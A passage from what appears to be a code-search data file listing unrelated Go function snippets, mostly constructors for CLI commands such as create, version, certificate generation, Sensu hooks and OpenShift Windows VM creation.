map[string]string{\n\t\t\ttypes.TagCommandType: types.TypeSystem,\n\t\t},\n\t}\n\treturn cmd\n}", "func InfoToCreateCmd(info os.FileInfo) string {\n\tmode := info.Mode()\n\tif mode >= 01000 { //symbolic linkg\n\t\tmode = DefaultFileMode\n\t}\n\tlocationType := \"C\"\n\tsize := info.Size()\n\tif info.IsDir() {\n\t\tlocationType = \"D\"\n\t\tsize = 0\n\t}\n\tfileMode := string(fmt.Sprintf(\"%v%04o\", locationType, mode.Perm())[:5])\n\treturn fmt.Sprintf(\"%v %d %s\\n\", fileMode, size, info.Name())\n}", "func createCommand() cli.Command {\n\treturn cli.Command{\n\t\tName: \"create\",\n\t\tBefore: survey.RequireGlobalFlagsFunc(requiredFlags...),\n\t\tAction: create(),\n\t}\n}", "func CreateExploreAuthCoinInfoCmd(cli *client.CommandLineClient) error {\n\tbc, err := client.NewLazyBaseClientFromCommandLineClient(cli)\n\tif err != nil {\n\t\treturn err\n\t}\n\tcreateAuthCoinCmd(cli, NewPluginExplorerClient(bc), cli.ExploreCmd)\n\treturn nil\n}", "func (opts *Options) CreateCommand() string {\n\tparts := []string{\"openssl pkcs12 -export\"}\n\treturn opts.Stringify(parts)\n}", "func newVersionCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints version information\",\n\t\tRunE: func(c *cobra.Command, args []string) error {\n\t\t\treturn versionTemplate.Execute(os.Stdout, build.GetInfo())\n\t\t},\n\t}\n}", "func newCreateCmd() *cobra.Command {\n\tcreateCmd := cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: `Create a new verless object`,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn cmd.Help()\n\t\t},\n\t}\n\n\tcreateCmd.AddCommand(newCreateProjectCmd())\n\tcreateCmd.AddCommand(newCreateThemeCmd())\n\tcreateCmd.AddCommand(newCreateFile())\n\n\treturn &createCmd\n}", "func CreateCmd() *cobra.Command {\n\tvar cmd = cobra.Command{\n\t\tUse: \"ch.viac\",\n\t\tShort: \"Import VIAC values from JSON files\",\n\t\tLong: `Open app.viac.ch, choose a portfolio, and select \"From start\" in the overview dash. In the Chrome dev tools, save the response from the \"performance\" XHR call, and pass the resulting file to this importer.`,\n\n\t\tArgs: cobra.ExactValidArgs(1),\n\n\t\tRunE: run,\n\t}\n\tcmd.Flags().StringP(\"from\", \"f\", \"0001-01-01\", \"YYYY-MM-DD - ignore entries before this date\")\n\tcmd.Flags().StringP(\"account\", \"a\", \"\", \"account name\")\n\treturn &cmd\n}", "func createCommand(t *runner.Task, actionFunc func(*cli.Context) error) *cli.Command {\n\tcommand := &cli.Command{\n\t\tName: t.Name,\n\t\tUsage: strings.TrimSpace(t.Usage),\n\t\tDescription: strings.TrimSpace(t.Description),\n\t\tAction: actionFunc,\n\t}\n\n\tfor _, arg := range t.Args {\n\t\tcommand.ArgsUsage += fmt.Sprintf(\"<%s> \", arg.Name)\n\t}\n\n\tcommand.CustomHelpTemplate = createCommandHelp(t)\n\n\treturn command\n}", "func NewCommandsInfoCmd(args ...interface{}) *redis.CommandsInfoCmd {\n\treturn redis.NewCommandsInfoCmd(args...)\n}", "func CreateCommand() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"create server\",\n\t\tRun: runCreateCommand,\n\t}\n\tcmd.Flags().AddFlagSet(createParam.getFlagSet())\n\treturn cmd\n}", "func CreateCommand() *cobra.Command {\n\treturn base.CreateCommand(\"template\", \"Create vt template from xml\", New())\n}", "func (c *Command) New() *cobra.Command {\n\tnewCommand := &cobra.Command{\n\t\tUse: \"annactl\",\n\t\tShort: \"Manage the API of the anna project. For more information see https://github.com/the-anna-project/annactl.\",\n\t\tLong: \"Manage the API of the anna project. For more information see https://github.com/the-anna-project/annactl.\",\n\t\tRun: c.Execute,\n\t}\n\n\tnewCommand.AddCommand(c.endpointCommand.New())\n\tnewCommand.AddCommand(c.versionCommand.New())\n\n\treturn newCommand\n}", "func CreateCommand(ca *common.CommonArgs) *cobra.Command {\n\tvar c command\n\tc = command{\n\t\tCommand: cobra.Command{\n\t\t\tUse: \"run\",\n\t\t\tShort: \"run observes the state of tugboat.lauches\",\n\t\t\tArgs: cobra.NoArgs,\n\t\t\tPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\t\treturn c.preexecute(cmd, args)\n\t\t\t},\n\t\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\t\treturn c.execute(cmd, args)\n\t\t\t},\n\t\t},\n\t\tCommonArgs: ca,\n\t\thttpFlagMgr: httpcliflags.New(),\n\t\tk8sFlagMgr: cliflags.New(),\n\t\tnotificationsFlagMgr: notificationscliflags.New(),\n\t}\n\n\tflags := c.Flags()\n\n\tc.httpFlagMgr.ConfigureHttpFlag(flags)\n\tc.k8sFlagMgr.ConfigureKubernetesConfig(flags)\n\tc.notificationsFlagMgr.ConfigureListenersFlag(flags)\n\n\treturn common.TraverseRunHooks(&c.Command)\n}", "func CreateCommand(s string) Command {\n\tfmt.Println(\"Creating command\")\n\n\treturn &ConsoleOutput{\n\t\tmessage: s,\n\t}\n}", "func (c *cmdCreate) OptionInfo() *cli.OptionInfo {\n\treturn c.option\n}", "func NewFunctionCreateCommand(c cli.Interface) *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"create FUNCTION IMAGE\",\n\t\tShort: \"Create function\",\n\t\tPreRunE: cli.ExactArgs(2),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\topts := &createFunctionOpts{}\n\t\t\topts.name = args[0]\n\t\t\topts.image = args[1]\n\t\t\treturn createFunction(c, opts)\n\t\t},\n\t}\n}", "func NewCommand() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Version for apisix-mesh-agent\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Println(version.String())\n\t\t},\n\t}\n\treturn cmd\n}", "func NewCreateCommand(c2ClientFactory cli.APIClientFactory) cli.Command {\n\tcreateCmd := &createCommand{\n\t\tc2ClientFactory: c2ClientFactory,\n\t}\n\n\tcobraCmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Creates a new client\",\n\t\tLong: fmt.Sprintf(\"Creates a new client, require an unique name, and a file containing either a password or a %d bytes key\", e4crypto.KeyLen),\n\t\tRunE: createCmd.run,\n\t}\n\n\tcobraCmd.Flags().SortFlags = false\n\tcobraCmd.Flags().StringVar(&createCmd.flags.Name, \"name\", \"\", \"The client name\")\n\tcobraCmd.Flags().StringVar(&createCmd.flags.KeyPath, \"key\", \"\", fmt.Sprintf(\"Filepath to a %d bytes key\", e4crypto.KeyLen))\n\tcobraCmd.Flags().StringVar(&createCmd.flags.PasswordPath, \"password\", \"\", \"Filepath to a plaintext password file\")\n\n\tcreateCmd.cobraCmd = cobraCmd\n\n\treturn createCmd\n}", "func InfoNew(opts ...func(*Info)) *Info {\n\tinf := &Info{\n\t\tVersion: version,\n\t\tUUID: createV4UUID(),\n\t}\n\tfor _, f := range opts {\n\t\tf(inf)\n\t}\n\treturn inf\n}", "func newCreateCmd(pather command.Pather) *cobra.Command {\n\tnow := time.Now().UTC()\n\tvar flags struct {\n\t\tcsr bool\n\t\tprofile string\n\t\tcommonName string\n\t\tnotBefore flag.Time\n\t\tnotAfter flag.Time\n\t\tca string\n\t\tcaKey string\n\t\texistingKey string\n\t\tcurve string\n\t\tbundle bool\n\t\tforce bool\n\t}\n\tflags.notBefore = flag.Time{\n\t\tTime: now,\n\t\tCurrent: now,\n\t}\n\tflags.notAfter = flag.Time{\n\t\tCurrent: now,\n\t\tDefault: \"depends on profile\",\n\t}\n\n\tvar cmd = &cobra.Command{\n\t\tUse: \"create [flags] <subject-template> <cert-file> <key-file>\",\n\t\tShort: \"Create a certificate or certificate signing request\",\n\t\tExample: fmt.Sprintf(` %[1]s create --profile cp-root subject.tmpl cp-root.crt cp-root.key\n %[1]s create --ca cp-ca.crt --ca-key cp-ca.key subject.tmpl chain.pem cp-as.key\n %[1]s create --csr subject.tmpl chain.csr cp-as.key`,\n\t\t\tpather.CommandPath(),\n\t\t),\n\t\tLong: `'create' generates a certificate or a certificate signing request (CSR).\n\nThe command takes the following positional arguments:\n- <subject-template> is the template for the certificate subject distinguished name.\n- <crt-file> is the file path where the certificate or certificate requests is\n written to. The parent directory must exist and must be writable.\n- <key-file> is the file path where the fresh private key is written to. The\n parent directory must exist and must be writable.\n\nBy default, the command creates a SCION control-plane PKI AS certificate. Another\ncertificate type can be selected by providing the --profile flag. If a certificate\nchain is desired, specify the --bundle flag.\n\nA fresh key is created in the provided <key-file>, unless the --key flag is set.\nIf the --key flag is set, an existing private key is used and the <key-file> is\nignored.\n\nThe --ca and --ca-key flags are required if a AS certificate or CA certificate\nis being created. Otherwise, they are not allowed.\n\nThe --not-before and --not-after flags can either be a timestamp or a relative\ntime offset from the current time.\n\nA timestamp can be provided in two different formats: unix timestamp and\nRFC 3339 timestamp. For example, 2021-06-24T12:01:02Z represents 1 minute and 2\nseconds after the 12th hour of June 26th, 2021 in UTC.\n\nThe relative time offset can be formated as a time duration string with the\nfollowing units: y, w, d, h, m, s. Negative offsets are also allowed. For\nexample, -1h indicates the time of tool invocation minus one hour. Note that\n--not-after is relative to the current time if a relative time offset is used,\nand not to --not-before.\n\nThe <subject-template> is the template for the distinguished name of the\nrequested certificate and must either be a x.509 certificate or a JSON file.\nThe common name can be overridden by supplying the --common-name flag.\n\nIf it is a x.509 certificate, the subject of the template is used as the subject\nof the created certificate or certificate chain request.\n\nA valid example for a JSON formatted template:\n` + subjectHelp,\n\t\tArgs: cobra.RangeArgs(2, 3),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif len(args) == 2 && flags.existingKey == \"\" {\n\t\t\t\treturn serrors.New(\"positional key file is required\")\n\t\t\t}\n\t\t\tct, err := parseCertType(flags.profile)\n\t\t\tif err != nil {\n\t\t\t\treturn serrors.WrapStr(\"parsing profile\", err)\n\t\t\t}\n\t\t\tsubject, err := createSubject(args[0], flags.commonName)\n\t\t\tif err != nil {\n\t\t\t\treturn serrors.WrapStr(\"creating subject\", err)\n\t\t\t}\n\n\t\t\t// Only check that the flags are set appropriately here.\n\t\t\t// Do the actual parsing after the usage help message is silenced.\n\t\t\tvar loadCA bool\n\t\t\tisSelfSigned := (ct == cppki.Root || ct == cppki.Regular || ct == cppki.Sensitive)\n\t\t\twithCA := (flags.ca != \"\" || flags.caKey != \"\")\n\t\t\tswitch {\n\t\t\tcase flags.csr && withCA:\n\t\t\t\treturn serrors.New(\"CA information set for CSR\")\n\t\t\tcase !flags.csr && isSelfSigned && withCA:\n\t\t\t\treturn serrors.New(\"CA information set for self-signed certificate\")\n\t\t\tdefault:\n\t\t\t\tloadCA = !isSelfSigned && !flags.csr\n\t\t\t}\n\n\t\t\tcmd.SilenceUsage = true\n\n\t\t\tvar privKey key.PrivateKey\n\t\t\tvar encodedKey []byte\n\t\t\tif flags.existingKey != \"\" {\n\t\t\t\tif privKey, err = key.LoadPrivateKey(flags.existingKey); err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"loading existing private key\", err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tif privKey, err = key.GeneratePrivateKey(flags.curve); err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"creating fresh private key\", err)\n\t\t\t\t}\n\t\t\t\tif encodedKey, err = key.EncodePEMPrivateKey(privKey); err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"encoding fresh private key\", err)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tvar caCertRaw []byte\n\t\t\tvar caCert *x509.Certificate\n\t\t\tvar caKey key.PrivateKey\n\t\t\tif loadCA {\n\t\t\t\tif caCertRaw, err = os.ReadFile(flags.ca); err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"read CA certificate\", err)\n\t\t\t\t}\n\t\t\t\tif caCert, err = parseCertificate(caCertRaw); err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"parsing CA certificate\", err)\n\t\t\t\t}\n\t\t\t\tif caKey, err = key.LoadPrivateKey(flags.caKey); err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"loading CA private key\", err)\n\t\t\t\t}\n\t\t\t}\n\t\t\tif isSelfSigned {\n\t\t\t\tcaKey = privKey\n\t\t\t}\n\n\t\t\tif flags.csr {\n\t\t\t\tcsr, err := CreateCSR(ct, subject, privKey)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"creating CSR\", err)\n\t\t\t\t}\n\t\t\t\tencodedCSR := pem.EncodeToMemory(&pem.Block{\n\t\t\t\t\tType: \"CERTIFICATE REQUEST\",\n\t\t\t\t\tBytes: csr,\n\t\t\t\t})\n\t\t\t\tif encodedCSR == nil {\n\t\t\t\t\tpanic(\"failed to encode CSR\")\n\t\t\t\t}\n\t\t\t\tcsrFile := args[1]\n\t\t\t\terr = file.WriteFile(csrFile, encodedCSR, 0644, file.WithForce(flags.force))\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"writing CSR\", err)\n\t\t\t\t}\n\t\t\t\tfmt.Printf(\"CSR successfully written to %q\\n\", csrFile)\n\t\t\t} else {\n\t\t\t\tcert, err := CreateCertificate(CertParams{\n\t\t\t\t\tType: ct,\n\t\t\t\t\tSubject: subject,\n\t\t\t\t\tPubKey: privKey.Public(),\n\t\t\t\t\tNotBefore: flags.notBefore.Time,\n\t\t\t\t\tNotAfter: notAfterFromFlags(ct, flags.notBefore, flags.notAfter),\n\t\t\t\t\tCAKey: caKey,\n\t\t\t\t\tCACert: caCert,\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"creating certificate\", err)\n\t\t\t\t}\n\t\t\t\tencodedCert := pem.EncodeToMemory(&pem.Block{\n\t\t\t\t\tType: \"CERTIFICATE\",\n\t\t\t\t\tBytes: cert,\n\t\t\t\t})\n\t\t\t\tif encodedCert == nil {\n\t\t\t\t\tpanic(\"failed to encode CSR\")\n\t\t\t\t}\n\t\t\t\tif flags.bundle {\n\t\t\t\t\tfmt.Println(\"Bundling certificate as certificate chain\")\n\t\t\t\t\tencodedCert = append(encodedCert, caCertRaw...)\n\t\t\t\t}\n\t\t\t\tcertFile := args[1]\n\t\t\t\terr = file.WriteFile(certFile, encodedCert, 0644, file.WithForce(flags.force))\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"writing certificate\", err)\n\t\t\t\t}\n\t\t\t\tfmt.Printf(\"Certificate successfully written to %q\\n\", certFile)\n\t\t\t}\n\n\t\t\tif encodedKey != nil {\n\t\t\t\tkeyFile := args[2]\n\t\t\t\tif err := file.CheckDirExists(filepath.Dir(keyFile)); err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"checking that directory of private key exists\", err)\n\t\t\t\t}\n\t\t\t\terr := file.WriteFile(keyFile, encodedKey, 0600, file.WithForce(flags.force))\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn serrors.WrapStr(\"writing private key\", err)\n\t\t\t\t}\n\t\t\t\tfmt.Printf(\"Private key successfully written to %q\\n\", keyFile)\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tcmd.Flags().BoolVar(&flags.csr, \"csr\", false,\n\t\t\"Generate a certificate signign request instead of a certificate\",\n\t)\n\tcmd.Flags().StringVar(&flags.profile, \"profile\", \"cp-as\",\n\t\t\"The type of certificate to generate (cp-as|cp-ca|cp-root|sensitive-voting|regular-voting)\",\n\t)\n\tcmd.Flags().Var(&flags.notBefore, \"not-before\",\n\t\t`The NotBefore time of the certificate. Can either be a timestamp or an offset.\n\nIf the value is a timestamp, it is expected to either be an RFC 3339 formatted\ntimestamp or a unix timestamp. If the value is a duration, it is used as the\noffset from the current time.`,\n\t)\n\tcmd.Flags().Var(&flags.notAfter, \"not-after\",\n\t\t`The NotAfter time of the certificate. Can either be a timestamp or an offset.\n\nIf the value is a timestamp, it is expected to either be an RFC 3339 formatted\ntimestamp or a unix timestamp. If the value is a duration, it is used as the\noffset from the current time.`,\n\t)\n\tcmd.Flags().StringVar(&flags.commonName, \"common-name\", \"\",\n\t\t\"The common name that replaces the common name in the subject template\",\n\t)\n\tcmd.Flags().StringVar(&flags.ca, \"ca\", \"\",\n\t\t\"The path to the issuer certificate\",\n\t)\n\tcmd.Flags().StringVar(&flags.caKey, \"ca-key\", \"\",\n\t\t\"The path to the issuer private key used to sign the new certificate\",\n\t)\n\tcmd.Flags().StringVar(&flags.existingKey, \"key\", \"\",\n\t\t\"The path to the existing private key to use instead of creating a new one\",\n\t)\n\tcmd.Flags().StringVar(&flags.curve, \"curve\", \"P-256\",\n\t\t\"The elliptic curve to use (P-256|P-384|P-521)\",\n\t)\n\tcmd.Flags().BoolVar(&flags.bundle, \"bundle\", false,\n\t\t\"Bundle the certificate with the issuer certificate as a certificate chain\",\n\t)\n\tcmd.Flags().BoolVar(&flags.force, \"force\", false,\n\t\t\"Force overwritting existing files\",\n\t)\n\n\treturn cmd\n}", "func CreateCommand(cli *cli.SensuCli) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse:\t\t\"create [NAME]\",\n\t\tShort:\t\t\"create new hooks\",\n\t\tSilenceUsage:\ttrue,\n\t\tPreRun: func(cmd *cobra.Command, args []string) {\n\t\t\tisInteractive, _ := cmd.Flags().GetBool(flags.Interactive)\n\t\t\tif !isInteractive {\n\t\t\t\t// Mark flags are required for bash-completions\n\t\t\t\t_ = cmd.MarkFlagRequired(\"command\")\n\t\t\t}\n\t\t},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif len(args) > 1 {\n\t\t\t\t_ = cmd.Help()\n\t\t\t\treturn errors.New(\"invalid argument(s) received\")\n\t\t\t}\n\n\t\t\tisInteractive, _ := cmd.Flags().GetBool(flags.Interactive)\n\t\t\topts := newHookOpts()\n\n\t\t\tif len(args) > 0 {\n\t\t\t\topts.Name = args[0]\n\t\t\t}\n\n\t\t\topts.Namespace = cli.Config.Namespace()\n\n\t\t\tif isInteractive {\n\t\t\t\tif err := opts.administerQuestionnaire(false); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\topts.withFlags(cmd.Flags())\n\t\t\t}\n\n\t\t\t// Apply given arguments to hook\n\t\t\thook := v2.HookConfig{}\n\t\t\topts.Copy(&hook)\n\n\t\t\tif err := hook.Validate(); err != nil {\n\t\t\t\tif !isInteractive {\n\t\t\t\t\tcmd.SilenceUsage = false\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t//\n\t\t\t// TODO:\n\t\t\t//\n\t\t\t// Current validation is a bit too laissez faire. For usability we should\n\t\t\t// determine whether there are assets / handlers / mutators associated w/\n\t\t\t// the hook and warn the user if they do not exist yet.\n\n\t\t\tif err := cli.Client.CreateHook(&hook); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tfmt.Fprintln(cmd.OutOrStdout(), \"Created\")\n\t\t\treturn nil\n\t\t},\n\t}\n\n\t_ = cmd.Flags().StringP(\"command\", \"c\", \"\", \"the command the hook should run\")\n\t_ = cmd.Flags().StringP(\"timeout\", \"t\", timeoutDefault, \"timeout, in seconds, at which the hook has to run\")\n\t_ = cmd.Flags().BoolP(\"stdin\", \"s\", false, \"stdin enabled on hook\")\n\n\thelpers.AddInteractiveFlag(cmd.Flags())\n\treturn cmd\n}", "func newInfo(conn *Connection, commands ...string) (*info, error) {\n\tcommandStr := strings.Trim(strings.Join(commands, \"\\n\"), \" \")\n\tif strings.Trim(commandStr, \" \") != \"\" {\n\t\tcommandStr += \"\\n\"\n\t}\n\tnewInfo := &info{\n\t\tmsg: NewMessage(MSG_INFO, []byte(commandStr)),\n\t}\n\n\tif err := newInfo.sendCommand(conn); err != nil {\n\t\treturn nil, err\n\t}\n\treturn newInfo, nil\n}", "func InfoCommand(cli *cli.SensuCli) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"info\",\n\t\tShort: \"show tessen configuration\",\n\t\tSilenceUsage: true,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif len(args) != 0 {\n\t\t\t\t_ = cmd.Help()\n\t\t\t\treturn errors.New(\"invalid argument(s) received\")\n\t\t\t}\n\n\t\t\tconfig := &corev2.TessenConfig{}\n\t\t\tif err := cli.Client.Get(config.URIPath(), config); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Determine the format to use to output the data\n\t\t\tflag := helpers.GetChangedStringValueViper(\"format\", cmd.Flags())\n\t\t\tformat := cli.Config.Format()\n\t\t\treturn helpers.PrintFormatted(flag, format, config, cmd.OutOrStdout(), printToList)\n\t\t},\n\t}\n\n\thelpers.AddFormatFlag(cmd.Flags())\n\n\treturn cmd\n}", "func NewCmd(octaviusDaemon daemon.Client, fileUtil file.File) *cobra.Command {\n\tvar metadataFilePath string\n\n\tcreateCmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create new octavius job metadata\",\n\t\tLong: \"This command helps create new job metadata to your CP host with proper metadata.json file\",\n\t\tExample: fmt.Sprintf(\"octavius create --job-path <filepath>/metadata.json\"),\n\t\tArgs: cobra.MaximumNArgs(0),\n\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\n\t\t\tprinter.Println(\"Creating a new job.\", color.FgBlack)\n\t\t\tmetadataFileIoReader, err := fileUtil.GetIoReader(metadataFilePath)\n\t\t\tif err != nil {\n\t\t\t\tlog.Error(err, \"error in reading file\")\n\t\t\t\tprinter.Println(fmt.Sprintf(\"error in reading file %v\", err.Error()), color.FgRed)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tclient := &client.GrpcClient{}\n\t\t\tres, err := octaviusDaemon.Post(metadataFileIoReader, client)\n\t\t\tif err != nil {\n\t\t\t\tlog.Error(err, \"error in creating metadata\")\n\t\t\t\tprinter.Println(fmt.Sprintf(\"error in creating metadata, %v\", status.Convert(err).Message()), color.FgRed)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tlog.Info(fmt.Sprintf(\"%s job created\", res.Name))\n\t\t\tprinter.Println(fmt.Sprintf(\"%s job created\", res.Name), color.FgGreen)\n\t\t},\n\t}\n\tcreateCmd.Flags().StringVarP(&metadataFilePath, \"job-path\", \"\", \"\", \"path to metadata.json(required)\")\n\terr := createCmd.MarkFlagRequired(\"job-path\")\n\tif err != nil {\n\t\tlog.Error(err, \"error while setting the flag required\")\n\t\tprinter.Println(\"error while setting the flag required\", color.FgRed)\n\t\treturn nil\n\t}\n\treturn createCmd\n}", "func createCommand(ctx context.Context, cmdline []string, env env) commander {\n\tlogrus.Debugf(\"command: %v (env: %s)\", cmdline, env)\n\tcmd := exec.CommandContext(ctx, cmdline[0], cmdline[1:]...)\n\tcmd.Env = env.AsPairs()\n\treturn cmd\n}", "func (r Describe) NewCommand(ctx context.Context, name string) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: name[strings.LastIndex(name, \".\")+1:] + \" [NAME[:VERSION]] [RESOURCE] [FILTER]\",\n\t\tShort: \"Describe registered releases with states information.\",\n\t\tLong: \"Describe registered releases with states information\",\n\t\tArgs: require.Args(r.validation),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tvar name string\n\t\t\tvar version semver.Version\n\t\t\tif len(args) > 0 {\n\t\t\t\tparts := strings.Split(args[0], \":\")\n\t\t\t\tparts = append(parts, \"\")\n\t\t\t\tname = parts[0]\n\n\t\t\t\tif parts[1] != \"\" {\n\t\t\t\t\tvar err error\n\t\t\t\t\tversion, err = semver.Parse(parts[1])\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tvar resource string\n\t\t\tif len(args) > 1 {\n\t\t\t\tresource = args[1]\n\t\t\t}\n\n\t\t\tvar filter string\n\t\t\tif len(args) > 2 {\n\t\t\t\tfilter = args[2]\n\t\t\t}\n\n\t\t\topts := describeOptions{\n\t\t\t\tName: name,\n\t\t\t\tVersion: version,\n\t\t\t\tResource: resource,\n\t\t\t\tFilter: filter,\n\t\t\t}\n\t\t\treturn r.run(ctx, cmd.OutOrStdout(), opts)\n\t\t},\n\t\tSilenceErrors: true,\n\t\tSilenceUsage: true,\n\t}\n\n\tcmd.SetUsageTemplate(global.DefaultUsageTemplate)\n\tcmd.SetHelpCommand(&cobra.Command{Hidden: true})\n\n\tflags := cmd.Flags()\n\tflags.SortFlags = false\n\tflags.Bool(\"help\", false, \"Show help information.\")\n\treturn cmd\n}", "func createCmd() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create a Windows instance on the same provider as the existing OpenShift Cluster.\",\n\t\tLong: \"creates a Windows instance under the same virtual network (AWS-VCP, Azure-Vnet, \" +\n\t\t\t\"and etc.) used by a given OpenShift cluster running on the selected provider. \" +\n\t\t\t\"The created instance would be ready to join the OpenShift Cluster as a worker node.\",\n\t\tPreRunE: func(cmd *cobra.Command, _ []string) error {\n\t\t\treturn validateCreateFlags(cmd)\n\t\t},\n\t\tRunE: func(_ *cobra.Command, _ []string) error {\n\t\t\tcloud, err := cloudprovider.CloudProviderFactory(rootInfo.kubeconfigPath, rootInfo.credentialPath,\n\t\t\t\trootInfo.credentialAccountID, rootInfo.resourceTrackerDir)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error creating cloud provider clients, %v\", err)\n\t\t\t}\n\t\t\terr = cloud.CreateWindowsVM(createFlagInfo.imageID, createFlagInfo.instanceType, createFlagInfo.sshKey)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error creating Windows Instance, %v\", err)\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tcmd.PersistentFlags().StringVar(&createFlagInfo.imageID, \"image-id\", \"\",\n\t\t\"ami ID of a base image for the instance (i.e.\"+\n\t\t\t\": ami-06a4e829b8bbad61e for Microsoft Windows Server 2019 Base image on AWS). (required)\")\n\tcmd.PersistentFlags().StringVar(&createFlagInfo.instanceType, \"instance-type\", \"\",\n\t\t\"name of a type of instance (i.e.: m4.large for AWS, etc). (required)\")\n\tcmd.PersistentFlags().StringVar(&createFlagInfo.sshKey, \"ssh-key\", \"\",\n\t\t\"name of existing ssh key on cloud provider for accessing the instance after it is created. (required)\")\n\treturn cmd\n}", "func NewCommand() *cobra.Command {\n\topts := &options{}\n\n\tcmd := &cobra.Command{\n\t\tUse: Name,\n\t\tShort: \"Launch the \" + Name,\n\t\tArgs: cobra.NoArgs,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tverflag.PrintAndExitIfRequested()\n\n\t\t\tif err := opts.complete(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := opts.validate(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tlog, err := logger.NewZapLogger(opts.config.LogLevel, opts.config.LogFormat)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error instantiating zap logger: %w\", err)\n\t\t\t}\n\n\t\t\tlogf.SetLogger(log)\n\t\t\tklog.SetLogger(log)\n\n\t\t\tlog.Info(\"Starting \"+Name, \"version\", version.Get())\n\t\t\tcmd.Flags().VisitAll(func(flag *pflag.Flag) {\n\t\t\t\tlog.Info(fmt.Sprintf(\"FLAG: --%s=%s\", flag.Name, flag.Value)) //nolint:logcheck\n\t\t\t})\n\n\t\t\t// don't output usage on further errors raised during execution\n\t\t\tcmd.SilenceUsage = true\n\t\t\t// further errors will be logged properly, don't duplicate\n\t\t\tcmd.SilenceErrors = true\n\n\t\t\treturn run(cmd.Context(), log, opts.config)\n\t\t},\n\t}\n\n\tflags := cmd.Flags()\n\tverflag.AddFlags(flags)\n\topts.addFlags(flags)\n\n\treturn cmd\n}", "func NewCommand() *cobra.Command {\n\topts := &options{}\n\n\tcmd := &cobra.Command{\n\t\tUse: Name,\n\t\tShort: \"Launch the \" + Name,\n\t\tArgs: cobra.NoArgs,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tverflag.PrintAndExitIfRequested()\n\n\t\t\tif err := opts.complete(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := opts.validate(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tlog, err := logger.NewZapLogger(opts.config.LogLevel, opts.config.LogFormat)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error instantiating zap logger: %w\", err)\n\t\t\t}\n\n\t\t\tlogf.SetLogger(log)\n\t\t\tklog.SetLogger(log)\n\n\t\t\tlog.Info(\"Starting \"+Name, \"version\", version.Get())\n\t\t\tcmd.Flags().VisitAll(func(flag *pflag.Flag) {\n\t\t\t\tlog.Info(fmt.Sprintf(\"FLAG: --%s=%s\", flag.Name, flag.Value)) //nolint:logcheck\n\t\t\t})\n\n\t\t\t// don't output usage on further errors raised during execution\n\t\t\tcmd.SilenceUsage = true\n\t\t\t// further errors will be logged properly, don't duplicate\n\t\t\tcmd.SilenceErrors = true\n\n\t\t\treturn run(cmd.Context(), log, opts.config)\n\t\t},\n\t}\n\n\tflags := cmd.Flags()\n\tverflag.AddFlags(flags)\n\topts.addFlags(flags)\n\n\treturn cmd\n}", "func newCreateIdentityCmd(f cmdutil.Factory, out io.Writer, errOut io.Writer) *cobra.Command {\n\tnewOptions := func() *createIdentityOptions {\n\t\treturn &createIdentityOptions{\n\t\t\tedgeOptions: 